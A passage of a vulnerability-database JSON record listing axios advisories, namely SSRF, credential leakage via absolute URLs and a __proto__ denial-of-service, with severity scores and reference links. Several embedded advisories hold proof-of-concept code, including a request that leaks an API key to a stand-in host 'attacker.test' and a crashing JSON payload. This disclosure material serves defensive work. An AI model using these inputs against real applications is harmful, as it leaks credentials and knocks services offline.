025-58754","GHSA-4hjh-wcwx-xvwj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-aq84-8cnz-byax"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/15996?format=json","vulnerability_id":"VCID-epu9-wdt3-kbay","summary":"Server-Side Request Forgery in axios\naxios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-39338.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-39338.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-39338","reference_id":"","reference_type":"","scores":[{"value":"0.02141","scoring_system":"epss","scoring_elements":"0.84295","published_at":"2026-05-05T12:55:00Z"},{"value":"0.02141","scoring_system":"epss","scoring_elements":"0.84277","published_at":"2026-04-29T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86309","published_at":"2026-04-21T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86315","published_at":"2026-04-18T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86311","published_at":"2026-04-16T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86295","published_at":"2026-04-13T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86298","published_at":"2026-04-12T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86301","published_at":"2026-04-11T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86286","published_at":"2026-04-09T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86276","published_at":"2026-04-08T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86257","published_at":"2026-04-07T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86238","published_at":"2026-04-02T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86256","published_at":"2026-04-04T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86337","published_at":"2026-04-26T12:55:00Z"},{"value":"0.0288","scoring_system":"epss","scoring_elements":"0.86327","published_at":"2026-04-24T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-39338"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/6b6b605eaf73852fb2dae033f1e786155959de3a","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/6b6b605eaf73852fb2dae033f1e786155959de3a"},{"reference_url":"https://github.com/axios/axios/issues/6463","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/issues/6463"},{"reference_url":"https://github.com/axios/axios/pull/6539","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6539"},{"reference_url":"https://github.com/axios/axios/pull/6543","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6543"},{"reference_url":"https://github.com/axios/axios/releases","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T19:24:57Z/"}],"url":"https://github.com/axios/axios/releases"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.7.4","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/releases/tag/v1.7.4"},{"reference_url":"https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html","reference_id":"","reference_type":"","scores":[{"value":"4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T19:24:57Z/"}],"url":"https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39338","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-39338"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1078878","reference_id":"1078878","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1078878"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2304369","reference_id":"2304369","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2304369"},{"reference_url":"https://github.com/advisories/GHSA-8hc4-vh64-cxmj","reference_id":"GHSA-8hc4-vh64-cxmj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8hc4-vh64-cxmj"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6209","reference_id":"RHSA-2024:6209","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6209"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6210","reference_id":"RHSA-2024:6210","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6210"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6211","reference_id":"RHSA-2024:6211","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6211"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:6667","reference_id":"RHSA-2024:6667","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:6667"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8014","reference_id":"RHSA-2024:8014","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8014"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8023","reference_id":"RHSA-2024:8023","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8023"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8981","reference_id":"RHSA-2024:8981","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8981"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55314?format=json","purl":"pkg:npm/axios@1.7.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-hq6f-86aj-8yav"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.4"}],"aliases":["CVE-2024-39338","GHSA-8hc4-vh64-cxmj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-epu9-wdt3-kbay"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/29219?format=json","vulnerability_id":"VCID-hq6f-86aj-8yav","summary":"axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL\n### Summary\n\nA previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463\n\nA similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠`baseURL` is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.\n\n### Details\n\nConsider the following code snippet:\n\n```js\nimport axios from \"axios\";\n\nconst internalAPIClient = axios.create({\n  baseURL: \"http://example.test/api/v1/users/\",\n  headers: {\n    \"X-API-KEY\": \"1234567890\",\n  },\n});\n\n// const userId = \"123\";\nconst userId = \"http://attacker.test/\";\n\nawait internalAPIClient.get(userId); // SSRF\n```\n\nIn this example, the request is sent to `http://attacker.test/` instead of the `baseURL`. As a result, the domain owner of `attacker.test` would receive the `X-API-KEY` included in the request headers.\n\nIt is recommended that:\n\n-\tWhen `baseURL` is set, passing an absolute URL such as `http://attacker.test/` to `get()` should not ignore `baseURL`.\n-\tBefore sending the HTTP request (after combining the `baseURL` with the user-provided parameter), axios should verify that the resulting URL still begins with the expected `baseURL`.\n\n### PoC\n\nFollow the steps below to reproduce the issue:\n\n1.\tSet up two simple HTTP servers:\n\n```\nmkdir /tmp/server1 /tmp/server2\necho \"this is server1\" > /tmp/server1/index.html \necho \"this is server2\" > /tmp/server2/index.html\npython -m http.server -d /tmp/server1 10001 &\npython -m http.server -d /tmp/server2 10002 &\n```\n\n\n2.\tCreate a script (e.g., main.js):\n\n```js\nimport axios from \"axios\";\nconst client = axios.create({ baseURL: \"http://localhost:10001/\" });\nconst response = await client.get(\"http://localhost:10002/\");\nconsole.log(response.data);\n```\n\n3.\tRun the script:\n\n```\n$ node main.js\nthis is server2\n```\n\nEven though `baseURL` is set to `http://localhost:10001/`, axios sends the request to `http://localhost:10002/`.\n\n### Impact\n\n-\tCredential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.\n-\tSSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.\n-\tAffected Users: Software that uses `baseURL` and does not validate path parameters is affected by this issue.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27152.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-27152.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27152","reference_id":"","reference_type":"","scores":[{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21881","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21938","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21978","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21965","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.2191","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.21835","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.2207","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00072","scoring_system":"epss","scoring_elements":"0.22018","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00212","scoring_system":"epss","scoring_elements":"0.43479","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.4436","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44282","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44363","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.44442","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00232","scoring_system":"epss","scoring_elements":"0.4609","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00232","scoring_system":"epss","scoring_elements":"0.46086","published_at":"2026-04-18T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-27152"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27152","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27152"},{"reference_url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}],"url":"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/02c3c69ced0f8fd86407c23203835892313d7fde"},{"reference_url":"https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f"},{"reference_url":"https://github.com/axios/axios/issues/6463","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-07T19:32:00Z/"}],"url":"https://github.com/axios/axios/issues/6463"},{"reference_url":"https://github.com/axios/axios/pull/6829","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/pull/6829"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.8.2","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios/releases/tag/v1.8.2"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-03-07T19:32:00Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27152","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-27152"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102223","reference_id":"1102223","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1102223"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2350618","reference_id":"2350618","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2350618"},{"reference_url":"https://github.com/advisories/GHSA-jr5f-v2jv-69x6","reference_id":"GHSA-jr5f-v2jv-69x6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jr5f-v2jv-69x6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/70089?format=json","purl":"pkg:npm/axios@1.8.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-aq84-8cnz-byax"},{"vulnerability":"VCID-x41s-g5mh-pkdq"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.8.2"}],"aliases":["CVE-2025-27152","GHSA-jr5f-v2jv-69x6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hq6f-86aj-8yav"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20921?format=json","vulnerability_id":"VCID-x41s-g5mh-pkdq","summary":"Axios is Vulnerable to Denial of Service via __proto__ Key in mergeConfig\n# Denial of Service via **proto** Key in mergeConfig\n\n### Summary\n\nThe `mergeConfig` function in axios crashes with a TypeError when processing configuration objects containing `__proto__` as an own property. An attacker can trigger this by providing a malicious configuration object created via `JSON.parse()`, causing complete denial of service.\n\n### Details\n\nThe vulnerability exists in `lib/core/mergeConfig.js` at lines 98-101:\n\n```javascript\nutils.forEach(Object.keys({ ...config1, ...config2 }), function computeConfigValue(prop) {\n  const merge = mergeMap[prop] || mergeDeepProperties;\n  const configValue = merge(config1[prop], config2[prop], prop);\n  (utils.isUndefined(configValue) && merge !== mergeDirectKeys) || (config[prop] = configValue);\n});\n```\n\nWhen `prop` is `'__proto__'`:\n\n1. `JSON.parse('{\"__proto__\": {...}}')` creates an object with `__proto__` as an own enumerable property\n2. `Object.keys()` includes `'__proto__'` in the iteration\n3. `mergeMap['__proto__']` performs prototype chain lookup, returning `Object.prototype` (truthy object)\n4. The expression `mergeMap[prop] || mergeDeepProperties` evaluates to `Object.prototype`\n5. `Object.prototype(...)` throws `TypeError: merge is not a function`\n\nThe `mergeConfig` function is called by:\n\n- `Axios._request()` at `lib/core/Axios.js:75`\n- `Axios.getUri()` at `lib/core/Axios.js:201`\n- All HTTP method shortcuts (`get`, `post`, etc.) at `lib/core/Axios.js:211,224`\n\n### PoC\n\n```javascript\nimport axios from \"axios\";\n\nconst maliciousConfig = JSON.parse('{\"__proto__\": {\"x\": 1}}');\nawait axios.get(\"https://httpbin.org/get\", maliciousConfig);\n```\n\n**Reproduction steps:**\n\n1. Clone axios repository or `npm install axios`\n2. Create file `poc.mjs` with the code above\n3. Run: `node poc.mjs`\n4. Observe the TypeError crash\n\n**Verified output (axios 1.13.4):**\n\n```\nTypeError: merge is not a function\n    at computeConfigValue (lib/core/mergeConfig.js:100:25)\n    at Object.forEach (lib/utils.js:280:10)\n    at mergeConfig (lib/core/mergeConfig.js:98:9)\n```\n\n**Control tests performed:**\n| Test | Config | Result |\n|------|--------|--------|\n| Normal config | `{\"timeout\": 5000}` | SUCCESS |\n| Malicious config | `JSON.parse('{\"__proto__\": {\"x\": 1}}')` | **CRASH** |\n| Nested object | `{\"headers\": {\"X-Test\": \"value\"}}` | SUCCESS |\n\n**Attack scenario:**\nAn application that accepts user input, parses it with `JSON.parse()`, and passes it to axios configuration will crash when receiving the payload `{\"__proto__\": {\"x\": 1}}`.\n\n### Impact\n\n**Denial of Service** - Any application using axios that processes user-controlled JSON and passes it to axios configuration methods is vulnerable. The application will crash when processing the malicious payload.\n\nAffected environments:\n\n- Node.js servers using axios for HTTP requests\n- Any backend that passes parsed JSON to axios configuration\n\nThis is NOT prototype pollution - the application crashes before any assignment occurs.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25639.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25639","reference_id":"","reference_type":"","scores":[{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15623","published_at":"2026-05-05T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15752","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15795","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15798","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1578","published_at":"2026-04-21T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15744","published_at":"2026-04-16T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1582","published_at":"2026-04-13T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1594","published_at":"2026-04-02T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15888","published_at":"2026-04-08T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15802","published_at":"2026-04-07T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15889","published_at":"2026-04-12T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.15927","published_at":"2026-04-11T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.16003","published_at":"2026-04-04T12:55:00Z"},{"value":"0.00051","scoring_system":"epss","scoring_elements":"0.1595","published_at":"2026-04-09T12:55:00Z"},{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.16649","published_at":"2026-04-18T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25639"},{"reference_url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639","reference_id":"","reference_type":"","scores":[],"url":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25639"},{"reference_url":"https://github.com/axios/axios","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/axios/axios"},{"reference_url":"https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"},{"reference_url":"https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/commit/d7ff1409c68168d3057fc3891f911b2b92616f9e"},{"reference_url":"https://github.com/axios/axios/pull/7369","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/pull/7369"},{"reference_url":"https://github.com/axios/axios/pull/7388","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/pull/7388"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.30.0","reference_id":"","reference_type":"","scores":[],"url":"https://github.com/axios/axios/releases/tag/v0.30.0"},{"reference_url":"https://github.com/axios/axios/releases/tag/v0.30.3","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/releases/tag/v0.30.3"},{"reference_url":"https://github.com/axios/axios/releases/tag/v1.13.5","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/releases/tag/v1.13.5"},{"reference_url":"https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-10T15:39:46Z/"}],"url":"https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25639","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25639"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907","reference_id":"1127907","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1127907"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2438237","reference_id":"2438237","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2438237"},{"reference_url":"https://github.com/advisories/GHSA-43fc-jf86-j433","reference_id":"GHSA-43fc-jf86-j433","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-43fc-jf86-j433"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:10184","reference_id":"RHSA-2026:10184","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:10184"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:11414","reference_id":"RHSA-2026:11414","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:11414"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13542","reference_id":"RHSA-2026:13542","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:13542"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:13548","reference_id":"RHSA-2